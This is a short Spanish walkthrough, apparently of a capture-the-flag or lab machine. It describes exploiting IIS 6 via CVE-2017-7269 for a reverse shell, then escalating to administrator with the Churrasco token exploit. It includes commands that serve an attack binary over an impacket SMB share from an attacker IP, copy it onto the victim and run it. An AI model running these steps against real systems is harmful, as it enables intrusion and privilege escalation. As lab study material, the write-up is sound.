Hacemos el escaneo con nmap:
Vemos un servicio de IIS en su versión 6 corriendo por el puerto 80, por lo que vamos a mirar:
Pero vamos a ver si hay exploits para explotar esta versión de IIS, donde vemos que sí con el CVE-2017-7269:
Y ahora poniendo esto otro en google ya vemos un exploit:
Y aquí vemos las instrucciones de cómo usar este exploit:
Por tanto lo lanzamos siguiendo estas instrucciones:
Y recibimos la reverse shell:
Y ya siendo el usuario administrador del servicio de la red:
Pero para escalar privilegios, tenemos que enumerar privilegios del sistema con el usuario que ya somos, usando el siguiente comando:
whoami/priv
Y vemos un privilegio que al estar habilitado nos puede servir para escalar:
Por tanto esto es vulnerable a rotten potato, por tanto hay un exploit llamado churrasco:
https://github.com/Re4son/Churrasco/
Nos lo compartimos con la máquina víctima:
impacket-smbserver recurso $(pwd) -smb2support
Dentro de la máquina víctima nos ubicamos dentro del directorio temp y aquí nos bajamos el archivo:
copy \\10.10.16.8\recurso\churrasco.exe churrasco.exe
Y ahora ejecutamos el siguiente comando con churrasco y ya somos el usuario administrador:
churrasco.exe -d "cmd.exe"












